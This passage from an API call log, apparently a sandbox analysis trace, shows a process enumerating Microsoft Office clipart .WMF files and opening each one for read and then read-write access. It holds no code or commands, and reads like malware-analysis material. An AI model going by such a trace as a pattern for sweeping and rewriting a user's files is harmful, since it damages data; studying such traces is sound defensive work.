cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00414_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.409] AreFileApisANSI () returned 1 [0104.409] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00414_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00414_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.409] GetFileType (hFile=0x27c) returned 0x1 [0104.410] CloseHandle (hObject=0x27c) returned 1 [0104.410] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00414_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00414_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.410] GetFileType (hFile=0x27c) returned 0x1 [0104.410] CloseHandle (hObject=0x27c) returned 1 [0104.410] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00414_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00414_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeb7dac, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeb7dac, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeb7dac, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2afa)) returned 1 [0104.410] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeb7dac, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeb7dac, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeb7dac, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x400c, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="FD00419_.WMF", cAlternateFileName="")) returned 1 [0104.410] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00419_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00419_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.410] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00419_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00419_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.410] GetFileType (hFile=0x27c) returned 0x1 [0104.410] CloseHandle (hObject=0x27c) returned 1 [0104.410] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00419_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00419_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.411] GetFileType (hFile=0x27c) returned 0x1 [0104.411] CloseHandle (hObject=0x27c) returned 1 [0104.411] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00419_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00419_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeb7dac, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeb7dac, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeb7dac, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x400c)) returned 1 [0104.411] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeb7dac, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeb7dac, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeb7dac, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x12bc, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="FD00428_.WMF", cAlternateFileName="")) returned 1 [0104.411] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00428_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00428_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.411] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00428_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00428_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.412] GetFileType (hFile=0x27c) returned 0x1 [0104.412] CloseHandle (hObject=0x27c) returned 1 [0104.412] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00428_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00428_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.412] GetFileType (hFile=0x27c) returned 0x1 [0104.412] CloseHandle (hObject=0x27c) returned 1 [0104.412] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00428_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00428_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeb7dac, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeb7dac, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeb7dac, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x12bc)) returned 1 [0104.412] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeb7dac, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeb7dac, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeb7dac, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x83c, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="FD00435_.WMF", cAlternateFileName="")) returned 1 [0104.412] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00435_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00435_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.412] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00435_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00435_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.412] GetFileType (hFile=0x27c) returned 0x1 [0104.412] CloseHandle (hObject=0x27c) returned 1 [0104.413] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00435_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00435_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.413] GetFileType (hFile=0x27c) returned 0x1 [0104.413] CloseHandle (hObject=0x27c) returned 1 [0104.413] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00435_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00435_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeb7dac, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeb7dac, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeb7dac, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x83c)) returned 1 [0104.413] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeb7dac, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeb7dac, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeb7dac, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x13ea, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="FD00438_.WMF", cAlternateFileName="")) returned 1 [0104.413] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00438_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00438_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.413] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00438_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00438_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.413] GetFileType (hFile=0x27c) returned 0x1 [0104.413] CloseHandle (hObject=0x27c) returned 1 [0104.413] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00438_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00438_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.413] GetFileType (hFile=0x27c) returned 0x1 [0104.414] CloseHandle (hObject=0x27c) returned 1 [0104.414] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00438_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00438_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeb7dac, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeb7dac, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeb7dac, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x13ea)) returned 1 [0104.414] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeb7dac, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeb7dac, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeb7dac, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x22de, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="FD00455_.WMF", cAlternateFileName="")) returned 1 [0104.414] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00455_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00455_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.414] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00455_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00455_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.414] GetFileType (hFile=0x27c) returned 0x1 [0104.415] CloseHandle (hObject=0x27c) returned 1 [0104.415] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00455_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00455_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.415] GetFileType (hFile=0x27c) returned 0x1 [0104.415] CloseHandle (hObject=0x27c) returned 1 [0104.415] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00455_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00455_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeb7dac, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeb7dac, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeb7dac, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x22de)) returned 1 [0104.415] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeb7dac, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeb7dac, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeb7dac, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x43fe, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="FD00459_.WMF", cAlternateFileName="")) returned 1 [0104.415] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00459_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00459_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.415] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00459_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00459_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.415] GetFileType (hFile=0x27c) returned 0x1 [0104.415] CloseHandle (hObject=0x27c) returned 1 [0104.415] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00459_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00459_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.416] GetFileType (hFile=0x27c) returned 0x1 [0104.416] CloseHandle (hObject=0x27c) returned 1 [0104.416] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00459_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00459_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeb7dac, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeb7dac, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeb7dac, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x43fe)) returned 1 [0104.416] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeb7dac, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeb7dac, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeb7dac, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5c0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="FD00543_.WMF", cAlternateFileName="")) returned 1 [0104.416] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00543_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00543_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.416] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00543_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00543_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.416] GetFileType (hFile=0x27c) returned 0x1 [0104.416] CloseHandle (hObject=0x27c) returned 1 [0104.417] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00543_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00543_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.417] GetFileType (hFile=0x27c) returned 0x1 [0104.417] CloseHandle (hObject=0x27c) returned 1 [0104.417] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00543_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00543_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeb7dac, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeb7dac, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeb7dac, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5c0)) returned 1 [0104.417] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeb7dac, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeb7dac, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeb7dac, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x148c, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="FD00544_.WMF", cAlternateFileName="")) returned 1 [0104.417] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00544_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00544_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.417] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00544_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00544_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.417] GetFileType (hFile=0x27c) returned 0x1 [0104.417] CloseHandle (hObject=0x27c) returned 1 [0104.417] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00544_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00544_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.417] GetFileType (hFile=0x27c) returned 0x1 [0104.417] CloseHandle (hObject=0x27c) returned 1 [0104.418] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00544_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00544_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeb7dac, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeb7dac, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeb7dac, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x148c)) returned 1 [0104.418] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeb7dac, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeb7dac, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeb7dac, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x380, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="FD00564_.WMF", cAlternateFileName="")) returned 1 [0104.418] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00564_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00564_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.418] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00564_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00564_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.418] GetFileType (hFile=0x27c) returned 0x1 [0104.418] CloseHandle (hObject=0x27c) returned 1 [0104.418] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00564_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00564_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.418] GetFileType (hFile=0x27c) returned 0x1 [0104.418] CloseHandle (hObject=0x27c) returned 1 [0104.418] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00564_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00564_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeb7dac, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeb7dac, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeb7dac, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x380)) returned 1 [0104.418] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeddf37, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeddf37, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeddf37, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2f0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="FD00586_.WMF", cAlternateFileName="")) returned 1 [0104.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00586_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00586_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.419] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00586_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00586_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, 